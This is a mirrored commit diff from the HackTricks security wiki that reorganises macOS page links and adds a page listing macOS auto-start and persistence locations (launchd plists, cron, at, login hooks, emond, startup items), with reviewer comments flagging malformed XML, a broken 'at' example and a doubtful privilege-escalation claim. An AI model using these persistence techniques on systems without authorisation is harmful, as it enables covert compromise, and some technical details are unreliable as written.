mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GITBOOK-3964: change request with no subject merged in GitBook
This commit is contained in:
parent
90af824f9f
commit
2f0f8ff2dd
18 changed files with 686 additions and 47 deletions
21
SUMMARY.md
|
@ -140,17 +140,19 @@
|
||||||
|
|
||||||
* [macOS Security & Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/README.md)
|
* [macOS Security & Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/README.md)
|
||||||
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
|
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
|
||||||
* [macOS Files, Folders & Binaries](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md)
|
* [macOS Files, Folders, Binaries & Memory](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md)
|
||||||
* [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md)
|
* [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md)
|
||||||
|
* [macOS Memory Dumping](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md)
|
||||||
|
* [macOS Sensitive Locations](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||||||
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
|
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
|
||||||
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
|
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
|
||||||
* [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md)
|
* [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md)
|
||||||
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
||||||
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
||||||
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
||||||
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md)
|
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
|
||||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
|
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
|
||||||
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
|
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
|
||||||
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
|
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
|
||||||
|
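Review bot: the `macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES` entry is repointed one level up, to `macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md`, while it stays nested under `macOS Library Injection`, which itself still lives under `macos-proces-abuse/`; either keep the page inside the library-injection folder or move the SUMMARY entry up beside the other top-level pages so the tree and the path agree. The IPC, XPC connecting-process check, PID reuse, XPC authorization and function-hooking entries all move from `macos-proces-abuse/` to `mac-os-architecture/`, so the `@ -84,8` and `@ -256,7` hunks further down (which rewrite relative links to `macos-ipc-inter-process-communication/` and `../macos-dyld-hijacking-and-dyld_insert_libraries.md`) are the ones to check against this tree. While these lines are being touched, the visible title `macOS Proces Abuse` is misspelled; correcting the title to `macOS Process Abuse` is cheap even if the `macos-proces-abuse/` folder name is kept for link stability.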
@ -160,13 +162,14 @@
|
||||||
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
|
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
|
||||||
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
||||||
* [macOS File Extension Apps](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
|
* [macOS File Extension Apps](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
|
||||||
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/README.md)
|
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-tcc.md)
|
||||||
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/macos-apple-scripts.md)
|
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/macos-apple-scripts.md)
|
||||||
* [macOS Sandbox](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/README.md)
|
* [macOS Sandbox](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/README.md)
|
||||||
* [macOS Sandbox Debug & Bypass](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/macos-sandbox-debug-and-bypass.md)
|
* [macOS Sandbox Debug & Bypass](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/macos-sandbox-debug-and-bypass.md)
|
||||||
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
||||||
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
* [macOS Red Teaming](macos-hardening/macos-red-teaming.md)
|
* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
|
||||||
|
* [macOS Auto Start Locations](macos-hardening/macos-auto-start-locations.md)
|
||||||
|
|
||||||
## 🪟 Windows Hardening
|
## 🪟 Windows Hardening
|
||||||
|
|
||||||
|
|
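Review bot: `macOS TCC` is changed from `macos-tcc/README.md` to `macos-tcc.md`, but the child entry `macOS Apple Scripts` still points into the directory (`macos-tcc/macos-apple-scripts.md`); if the TCC page has been flattened to a single file, that child link is now dangling and should be moved alongside it (or the directory kept and `README.md` restored). Note also the two `macos-hardening` pages move in opposite directions: `macOS Red Teaming` goes down into `macos-security-and-privilege-escalation/macos-red-teaming.md`, while the new `macOS Auto Start Locations` is added at `macos-hardening/macos-auto-start-locations.md`; the new file's kext section links to `macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers` relative to that top-level placement, so a quick check that both paths resolve is worthwhile.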
377
macos-hardening/macos-auto-start-locations.md
Normal file
|
@ -0,0 +1,377 @@
|
||||||
|
# macOS Auto Start Locations
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Here are locations on the system that could lead to the **execution** of a binary **without** **user** **interaction**.
|
||||||
|
|
||||||
|
### Launchd
|
||||||
|
|
||||||
|
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
|
||||||
|
|
||||||
|
* `/Library/LaunchAgents`: Per-user agents installed by the admin
|
||||||
|
* `/Library/LaunchDaemons`: System-wide daemons installed by the admin
|
||||||
|
* `/System/Library/LaunchAgents`: Per-user agents provided by Apple.
|
||||||
|
* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple.
|
||||||
|
|
||||||
|
When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**.
|
||||||
|
|
||||||
|
The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** (as there are services like ssh that needs to be executed before any user access the system). Also agents may use GUI while daemons need to run in the background.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
|
||||||
|
<plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>Label</key>
|
||||||
|
<string>com.apple.someidentifier</string>
|
||||||
|
<key>ProgramArguments</key>
|
||||||
|
<array>
|
||||||
|
<string>/Users/username/malware</string>
|
||||||
|
</array>
|
||||||
|
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
|
||||||
|
<key>StartInterval</key>
|
||||||
|
<integer>800</integer> <!--Execute each 800s-->
|
||||||
|
<key>KeepAlive</key>
|
||||||
|
<dict>
|
||||||
|
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
|
||||||
|
<!--If previous is true, then re-execute in successful exit-->
|
||||||
|
</dict>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
|
||||||
|
There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example).
|
||||||
|
|
||||||
|
\{% hint style="info" %\} New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load <target.plist>` It's **also possible to load .plist files without that extension** with `launchctl -F <file>` (however those plist files won't be automatically loaded after reboot).\
|
||||||
|
It's also possible to **unload** with `launchctl unload <target.plist>` (the process pointed by it will be terminated),
|
||||||
|
|
||||||
|
To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` \{% endhint %\}
|
||||||
|
|
||||||
|
List all the agents and daemons loaded by the current user:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
launchctl list
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cron
|
||||||
|
|
||||||
|
List the cron jobs of the **current user** with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
crontab -l
|
||||||
|
```
|
||||||
|
|
||||||
|
You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** (needs root).
|
||||||
|
|
||||||
|
In MacOS several folders executing scripts with **certain frequency** can be found in:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
|
||||||
|
```
|
||||||
|
|
||||||
|
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
|
||||||
|
|
||||||
|
The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that if a script is stored in `/etc/periodic/` as a way to **escalate privilege**s, it will be **executed** as the **owner of the file**.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
|
||||||
|
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
|
||||||
|
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
|
||||||
|
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
|
||||||
|
```
|
||||||
|
|
||||||
|
### kext
|
||||||
|
|
||||||
|
In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**:
|
||||||
|
|
||||||
|
* `/System/Library/Extensions`
|
||||||
|
* KEXT files built into the OS X operating system.
|
||||||
|
* `/Library/Extensions`
|
||||||
|
* KEXT files installed by 3rd party software
|
||||||
|
|
||||||
|
You can list currently loaded kext files with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
kextstat #List loaded kext
|
||||||
|
kextload /path/to/kext.kext #Load a new one based on path
|
||||||
|
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
|
||||||
|
kextunload /path/to/kext.kext
|
||||||
|
kextunload -b com.apple.driver.ExampleBundle
|
||||||
|
```
|
||||||
|
|
||||||
|
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers).
|
||||||
|
|
||||||
|
### **Login Items**
|
||||||
|
|
||||||
|
In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
|
||||||
|
It it's possible to list them, add and remove from the command line:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#List all items:
|
||||||
|
osascript -e 'tell application "System Events" to get the name of every login item'
|
||||||
|
|
||||||
|
#Add an item:
|
||||||
|
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
|
||||||
|
|
||||||
|
#Remove an item:
|
||||||
|
osascript -e 'tell application "System Events" to delete login item "itemname"'
|
||||||
|
```
|
||||||
|
|
||||||
|
These items are stored in the file /Users/\<username>/Library/Application Support/com.apple.backgroundtaskmanagementagent
|
||||||
|
|
||||||
|
### At
|
||||||
|
|
||||||
|
“At tasks” are used to **schedule tasks at specific times**.\
|
||||||
|
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
|
||||||
|
|
||||||
|
By **default** they are **disabled** but the **root** user can **enable** **them** with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
|
||||||
|
```
|
||||||
|
|
||||||
|
This will create a file at 13:37:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo hello > /tmp/hello | at 1337
|
||||||
|
```
|
||||||
|
|
||||||
|
If AT tasks aren't enabled the created tasks won't be executed.
|
||||||
|
|
||||||
|
### Login/Logout Hooks
|
||||||
|
|
||||||
|
They are deprecated but can be used to execute commands when a user logs in.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cat > $HOME/hook.sh << EOF
|
||||||
|
#!/bin/bash
|
||||||
|
echo 'My is: \`id\`' > /tmp/login_id.txt
|
||||||
|
EOF
|
||||||
|
chmod +x $HOME/hook.sh
|
||||||
|
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`
|
||||||
|
|
||||||
|
```bash
|
||||||
|
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
|
||||||
|
{
|
||||||
|
LoginHook = "/Users/username/hook.sh";
|
||||||
|
MiniBuddyLaunch = 0;
|
||||||
|
TALLogoutReason = "Shut Down";
|
||||||
|
TALLogoutSavesState = 0;
|
||||||
|
oneTimeSSMigrationComplete = 1;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
To delete it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
defaults delete com.apple.loginwindow LoginHook
|
||||||
|
```
|
||||||
|
|
||||||
|
In the previous example we have created and deleted a **LoginHook**, it's also possible to create a **LogoutHook**.
|
||||||
|
|
||||||
|
The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
|
||||||
|
|
||||||
|
### Emond
|
||||||
|
|
||||||
|
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
|
||||||
|
|
||||||
|
This little-known service may **not be much use to a Mac admin**, but to a threat actor one very good reason would be to use it as a **persistence mechanism that most macOS admins probably wouldn't know** to look for. Detecting malicious use of emond shouldn't be difficult, as the System LaunchDaemon for the service looks for scripts to run in only one place:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l /private/var/db/emondClients
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
**As this isn't used much, anything in that folder should be suspicious**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Startup Items
|
||||||
|
|
||||||
|
\{% hint style="danger" %\} **This is deprecated, so nothing should be found in the following directories.** \{% endhint %\}
|
||||||
|
|
||||||
|
A **StartupItem** is a **directory** that gets **placed** in one of these two folders. `/Library/StartupItems/` or `/System/Library/StartupItems/`
|
||||||
|
|
||||||
|
After placing a new directory in one of these two locations, **two more items** need to be placed inside that directory. These two items are a **rc script** **and a plist** that holds a few settings. This plist must be called “**StartupParameters.plist**”.
|
||||||
|
|
||||||
|
{% tabs %}
|
||||||
|
{% tab title="StartupParameters.plist" %}
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||||
|
<plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>Description</key>
|
||||||
|
<string>This is a description of this service</string>
|
||||||
|
<key>OrderPreference</key>
|
||||||
|
<string>None</string> <!--Other req services to execute before this -->
|
||||||
|
<key>Provides</key>
|
||||||
|
<array>
|
||||||
|
<string>superservicename</string> <!--Name of the services provided by this file -->
|
||||||
|
</array>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
|
||||||
|
{% tab title="superservicename" %}
|
||||||
|
```bash
|
||||||
|
#!/bin/sh
|
||||||
|
. /etc/rc.common
|
||||||
|
|
||||||
|
StartService(){
|
||||||
|
touch /tmp/superservicestarted
|
||||||
|
}
|
||||||
|
|
||||||
|
StopService(){
|
||||||
|
rm /tmp/superservicestarted
|
||||||
|
}
|
||||||
|
|
||||||
|
RestartService(){
|
||||||
|
echo "Restarting"
|
||||||
|
}
|
||||||
|
|
||||||
|
RunService "$1"
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
{% endtabs %}
|
||||||
|
|
||||||
|
### /etc/rc.common
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
**This isn't working in modern MacOS versions**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#
|
||||||
|
# Common setup for startup scripts.
|
||||||
|
#
|
||||||
|
# Copyright 1998-2002 Apple Computer, Inc.
|
||||||
|
#
|
||||||
|
|
||||||
|
######################
|
||||||
|
# Configure the shell #
|
||||||
|
######################
|
||||||
|
|
||||||
|
#
|
||||||
|
# Be strict
|
||||||
|
#
|
||||||
|
#set -e
|
||||||
|
set -u
|
||||||
|
|
||||||
|
#
|
||||||
|
# Set command search path
|
||||||
|
#
|
||||||
|
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
|
||||||
|
|
||||||
|
#
|
||||||
|
# Set the terminal mode
|
||||||
|
#
|
||||||
|
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
|
||||||
|
# TERM=$(tset - -Q); export TERM
|
||||||
|
#fi
|
||||||
|
|
||||||
|
###################
|
||||||
|
# Useful functions #
|
||||||
|
###################
|
||||||
|
|
||||||
|
#
|
||||||
|
# Determine if the network is up by looking for any non-loopback
|
||||||
|
# internet network interfaces.
|
||||||
|
#
|
||||||
|
CheckForNetwork()
|
||||||
|
{
|
||||||
|
local test
|
||||||
|
|
||||||
|
if [ -z "${NETWORKUP:=}" ]; then
|
||||||
|
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
|
||||||
|
if [ "${test}" -gt 0 ]; then
|
||||||
|
NETWORKUP="-YES-"
|
||||||
|
else
|
||||||
|
NETWORKUP="-NO-"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
alias ConsoleMessage=echo
|
||||||
|
|
||||||
|
#
|
||||||
|
# Process management
|
||||||
|
#
|
||||||
|
GetPID ()
|
||||||
|
{
|
||||||
|
local program="$1"
|
||||||
|
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
|
||||||
|
local pid=""
|
||||||
|
|
||||||
|
if [ -f "${pidfile}" ]; then
|
||||||
|
pid=$(head -1 "${pidfile}")
|
||||||
|
if ! kill -0 "${pid}" 2> /dev/null; then
|
||||||
|
echo "Bad pid file $pidfile; deleting."
|
||||||
|
pid=""
|
||||||
|
rm -f "${pidfile}"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -n "${pid}" ]; then
|
||||||
|
echo "${pid}"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generic action handler
|
||||||
|
#
|
||||||
|
RunService ()
|
||||||
|
{
|
||||||
|
case $1 in
|
||||||
|
start ) StartService ;;
|
||||||
|
stop ) StopService ;;
|
||||||
|
restart) RestartService ;;
|
||||||
|
* ) echo "$0: unknown argument: $1";;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Profiles
|
||||||
|
|
||||||
|
Configuration profiles can force a user to use certain browser settings, DNS proxy settings, or VPN settings. Many other payloads are possible which make them ripe for abuse.
|
||||||
|
|
||||||
|
You can enumerate them running:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -Rl /Library/Managed\ Preferences/
|
||||||
|
```
|
||||||
|
|
||||||
|
### Other persistence techniques and tools
|
||||||
|
|
||||||
|
* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
|
||||||
|
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
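Review bot: the launchd plist example in this new file is not well-formed XML: `<key>SuccessfulExit</key></false>` closes an element that was never opened and should be `<key>SuccessfulExit</key><false/>`. In the same section, the path in the hint, `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`, misspells `LaunchDaemons` (please also verify the plist name), the hint's `launchctl -F <file>` drops the `load` subcommand that the At section's `sudo launchctl load -F ...` correctly uses, and the paragraph on per-user plists lists `/Users/$USER/Library/LaunchDemons`, which is both misspelled and not a location launchd consults: only `~/Library/LaunchAgents` is loaded for a user, there are no per-user daemons. The At example `echo hello > /tmp/hello | at 1337` redirects echo's output to the file before the pipe, so `/tmp/hello` is written immediately and `at` reads an empty job; to schedule the command it should be `echo "echo hello > /tmp/hello" | at 1337`. In the Cron section, the claim that a script dropped into `/etc/periodic/` "will be executed as the owner of the file" conflicts with the preceding sentence that the scripts are run by the `com.apple.periodic*` launch daemons, which run as root regardless of file ownership; please verify and correct, since that is exactly the privilege-escalation point a reader will act on. Smaller items: `kextload -b com.apple.driver.ExampleBundle #Load a new one based on path` should say "based on bundle identifier"; the login-hook script `echo 'My is: \`id\`'` writes the literal backticks because of the single quotes (and reads "My id is:" as intended wording); "OX S kernel" in the launchd paragraph; and "It it's possible" in Login Items.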
@ -92,7 +92,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u
|
||||||
|
|
||||||
### Entitlements and Privileges abuse via process abuse
|
### Entitlements and Privileges abuse via process abuse
|
||||||
|
|
||||||
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-sandbox/) or [TCC](macos-tcc/).
|
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-sandbox/) or [TCC](macos-tcc.md).
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="broken-reference" %}
|
||||||
[Broken link](broken-reference)
|
[Broken link](broken-reference)
|
||||||
|
|
|
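Review bot: the `{% content-ref url="broken-reference" %}` / `[Broken link](broken-reference)` block directly under the edited sentence is left as a broken reference on both sides of the hunk; since the sentence above it is being edited anyway to repoint `TCC` at `macos-tcc.md`, this is the place to repoint the content-ref (presumably to the process-abuse page the sentence introduces) rather than keep shipping a broken block. The sentence itself would also read better as "If a process can inject code into another process with more privileges or entitlements, or contact it to perform privileged actions, it can escalate privileges and bypass defensive measures such as ..." (fixing `privileges actions`, `meassures` and `he could`).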
@ -84,8 +84,8 @@ kextunload com.apple.iokit.IOReportFamily
|
||||||
|
|
||||||
### IPC - Inter Process Communication
|
### IPC - Inter Process Communication
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/macos-ipc-inter-process-communication/" %}
|
{% content-ref url="macos-ipc-inter-process-communication/" %}
|
||||||
